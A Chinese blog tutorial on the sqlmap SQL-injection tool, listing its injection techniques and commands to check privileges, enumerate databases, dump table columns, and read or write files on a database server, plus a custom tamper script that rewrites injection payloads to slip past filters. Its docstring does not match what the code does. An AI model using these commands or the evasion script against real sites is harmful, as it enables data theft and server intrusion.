sqlmap工具的使用

已于 2022-08-16 11:55:07 修改
阅读量8.1k 收藏 2
点赞数 2
分类专栏: Tools 文章标签: sql扫描工具 安全工具
于 2021-11-05 22:26:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45951067/article/details/121171894
版权

推荐文章:
https://www.cnblogs.com/linwenbin/p/10564036.html

参数:–technique

此参数用于指定检测注入时所用技术。默认情况下Sqlmap会使用自己支持的全部技术进行检测。 此参数后跟表示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下:

B:Boolean-based blind(布尔型注入)
E:Error-based(报错型注入)
U:Union query-based(可联合查询注入)
S:Stacked queries(可多语句查询注入)
T:Time-based blind(基于时间延迟注入)
Q:Inline queries(嵌套查询注入)
可以用“–technique ES”来指定使用两种检测技术。“–technique BEUSTQ”与默认情况等效。

想要访问文件系统或是Windows的注册表就一定要添加“S”进行多语句查询注入测试。

-p指定参数

–dump
–batch

sqlmap工具的基本使用:

基本语法(-v是扫描等级):

python sqlmap.py -u "url" -v [1-5]
判断是否高权限用户:

–privileges可以返回数据库权限等级

python sqlmap.py -u "url" -v [1-5]  --privileges

–is-dba 也可以实现同样功能(返回true or false)

python sqlmap.py -u "url" -v [1-5]  --is-dba
是高权限用户(root)即可查询到下列数据:

1.–dbs 查看共有哪些数据库,返回值(available databases[x]),返回所有的数据库

python sqlmap.py -u "url" -v [1-5] --dbs

2.–current-db 查看当前网站数据库

python sqlmap.py -u "url" -v [1-5] --current-db

3.–tables 可以获取表,-D " "指定数据库名-T " "指定表名

python sqlmap.py -u "url" -v [1-5] --tables -D "public" -T "tables"

4.指定列名:

python sqlmap.py -u "url" -v [1-5] --tables -D "public" -T "tables" --dump -C "user"

5.读取文件:

python sqlmap.py -u "url" --file-read "路径"

6.上传文件到数据库服务器中
–file-dest或者–file-write

python sqlmap.py -u "url" --file-write "路径"

其他的可以通过帮助信息进行查看

python sqlmap.py --help

下载地址:
https://github.com/sqlmapproject/sqlmap
使用方法文档:
https://github.com/sqlmapproject/sqlmap/wiki/Usage

相关博客:
详讲sqlmap
你知道吗?你用的大马可能早就被植入了后门!
如何利用xss拿下一个站的权限?
渗透测试常用靶场集合

tamper的开发:

简单例子:
在这里插入图片描述

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')

    Requirement:
        * MySQL

    Notes:
        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

    >>> tamper('SELECT id FROM testdb.users')
    'SELECT id FROM testdb 9.e.users'
    """
    result = payload.replace('%20','%0A').replace('=','regexp').replace("'","").replace('AND','&&').replace('OR','||').replace(' ','%0A').replace(')','',1)
    return '||'+'if'+'('+ result +')'+';%00'
向阳-Y.
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap工具使用.emmx
07-26
sqlmap工具使用.emmx
sqlmap工具使用.xmind
07-26
sqlmap工具使用.xmind
SQL注入知识点详解
qq_44857938的博客
06-19 1128
SQL注入 大家好,我又来了,这回给大家分享一下自己总结的sql注入学习笔记,sql注入是一个极为重要的漏洞,可能博主总结的有所缺陷,希望大家多多补充,大家一起进步,好了,闲话少扯,直接上干货。 1.SQL注入介绍 SQL注入攻击就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 (1)造成SQL注入的原因 程序开发过程中不注意书写规范,对sql语句和关键字过滤不严格,导致客户端可以通过全局性变量get或者post提交sql语句到服务器端正常运行。
web漏洞“小迪安全课堂笔记”SQL注入
weixin_42902126的博客
03-20 3263
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL注入是什么?注入原理二、使用步骤1.引入库2.读入数据总结参考资料 前言 提示:这里可以添加本文要记录的大概内容: sql注入,总结以下。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL注入是什么? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据.
安全测试必备工具 —— SQLMap 安装及基本应用!
最新发布
05-06 837
检测SQL注入漏洞的专用工具安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用
渗透测试实验_在kali Linux 2021环境下使用sqlmap对DVWA进行sql注入
weixin_47133613的博客
04-06 7811
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
Linux-学习之漏洞探索sqlmap
weixin_34290390的博客
03-05 419
输出信息: [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws....
win版本的sqlmap报错解决
weixin_42075643的博客
01-29 5105
原来好好地环境突然报如下错: 查了好久资料,竟然没人遇到过 解决方法: python sqlmap.py --update 没想到吧,完美解决,原来是版本低的原因,我也是醉了,以此记录下。。。
sqlmap工具
11-26
sqlmap工具测试sql注入非常方便,使用非常简单。sqlmap漏洞测试。
sqlmap工具2020
02-27
sqlmap是一个工具,一个用来做sql注入攻击的工具。这个sqlmap需要python2才可以正常执行,注意python3不行哦。
直接下载sqlmap工具
02-21
直接下载sqlmap工具
关于 SQLMAP报错如何解决
zengcaomeiii的博客
07-01 1760
11
sqlmap学习(六)设置请求参数
rane的博客
03-26 739
1、sqlmap设置忽略401 --ignore-401参数用来忽略未验证错误 2、sqlmap设置HTTP协议私钥 当web服务器需要适当的客户端证书和用于身份验证的私钥时,使用此选项 --auth-file文件名 3、sqlmap设置安全模式 避免在多次请求失败后销毁会话 有时,如果执行了一定数量的不成功请求,则在此期间的web应用程序或检查技术会销毁会话。 有的web应用程序会在你多次访问错...
Kali:sqlmap :[10:39:37] [CRITICAL] unable to connect to the target URL
二十四桥明月夜
04-17 4527
1、kali中使用sqlamp 访问靶机OWAS中页面进行SQL注入提示:unable to connect to the target URL 2、看了网上的都是扯淡增加代理访问 sqlmap -u "http://192.168.111.132/mutillidae/index.php?page=user-info.php&username=zhuzhu&password=123456&user-info-php-submit-button=View+Account+Det
sqlmap进阶之路
weixin_30480583的博客
09-01 203
1.sqlmap直接数据库,文件读取目标 -l ,-x(xml站点地图),-m(多行文本url),-r, url探测 --banner(t探测数据库), -g(Google)批量扫描注入2,使用post方式时可以指定分隔符 --pa'ram-del="&" , bp截取的文件参数后面加*如同 使用--level 3 检测cookie注入, --heads 可以设置额外的http...
渗透测试工具sqlmap基础教程
wjy397的专栏
12-16 1734
http://blog.csdn.net/zgyulongfei/article/details/41017493 版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] 转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛  本
渗透神器sqlmap使用笔记
煜铭2011
04-14 8648
0x00前言 sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!! 下载地址:https://github.com/sqlmapproj...
Scrapy shell调试返回403错误
热门推荐
fendo
04-17 1万+
一、问题描述 有时候用scrapy shell来调试很方便,但是有些网站有防爬虫机制,所以使用scrapy shell会返回403,比如下面 C:\Users\fendo>scrapy shell https://book.douban.com/subject/26805083/ 2017-04-17 15:18:53 [scrapy.utils.log] INFO: Scra
kali工具sqlmap使用教程
09-06
请注意,为了保护目标网站的安全和合法性,你需要在授权的情况下使用sqlmap工具进行SQL注入测试。同时,你也应该遵守法律法规和道德规范,在进行任何渗透测试活动时要遵循合法和合规的原则。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值